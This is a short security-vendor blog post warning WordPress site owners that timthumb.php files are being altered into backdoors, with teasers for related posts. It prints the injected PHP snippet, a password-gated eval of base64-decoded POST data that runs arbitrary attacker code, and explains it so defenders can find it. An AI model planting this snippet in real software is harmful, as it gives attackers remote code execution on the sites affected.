TimThumb.php backdoor

If your site got compromised lately with the TimThumb.php vulnerability, make sure to check that script to see if it was not modified to act as a backdoor as well.

We are seeing in many sites the timthumb.php with the following code added to it:

if (md5 (md5($_POST[‘p’]))===’xxx8ab2ab.. a4ec61072xxx’)
die (eval ( base64_decode ($_POST[‘c’])));

If you are not sure what this code does, it receives a password via the “p” POST and if it is correct, it executes any PHP code sent by the attackers in the “c” POST variable.
For more information about backdoors, we did a nice post about them: ASK Sucuri: What about the backdoors?

David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Related Tags

WordPress Vulnerability & Patch Roundup February 2023

Cesar Anjos
February 27, 2023

Vulnerability reports and responsible disclosures are essential for website security awareness and education. Automated attacks targeting known software vulnerabilities are one of the leading causes…

Read the Post

P.A.S. Fork v. 1.0 — A Web Shell Revival

Luke Leal
October 26, 2020

A PHP web shell containing multiple functions can easily consist of thousands of lines of code, so it’s no surprise that attackers often reuse the…

Read the Post

Reflected XSS in Advanced Ads Admin Dashboard

Antony Garand
March 17, 2020

A patch for a vulnerability in the Advanced Ads plugin has been released. Prior to version 1.17.4, attackers were able to exploit two reflected XSS…

Read the Post

Top Ten Most Cumbersome Website Infections to Remove in 2021

Ben Martin
May 26, 2022

In today’s post we’re going to be going over the top ten most cumbersome website infections to remove, based on the sheer number of files…

Read the Post

Reversed URLs Randomly Redirect to Scams

Denis Sinegubko
December 14, 2017

We are seeing hundreds of infected WordPress sites with the following scripts (in one line) injected in random places in wp_posts table. $vTB$I_919AeEAw2z$KX=function(n){if (typeof ($vTB$I_919AeEAw2z$KX.list[n])…

Read the Post

Expired Domain Leads to WordPress Plugin Redirects

Krasimir Konov
August 24, 2017

A malicious redirect is a snippet of code used by attackers with the intention of redirecting visitors to another site; a very common tactic seen…

Read the Post

Hacking WordPress Sites on Shared Servers

Denis Sinegubko
September 19, 2016

A website is only as safe as the weakest link on its shared server. Once a hacker gains access to one site on the server,…

Read the Post

Sucuri WordPress Vulnerability Roundup May 2025

Vulnerability & Patch Roundup — May 2025

Sucuri Malware Research Team
May 30, 2025

Read the Post

How Malware Gets On Your Website

Ashley Sand
December 13, 2021

Almost since the Internet’s inception malware infections have kept pace to be the biggest nuisance a site owner experiences. With an ever growing amount of…

Read the Post

Analysis of the Fake WordPress CVE-2023-46182 Patch Plugin & Phishing Campaign

Denis Sinegubko
December 14, 2023

On December 1, 2023, several security researchers reported about a new phishing campaign targeting WordPress administrators. WordPress sites owners had started receiving emails from WordPress.com…

Read the Post

Related Tags

Related Categories

You May Also Like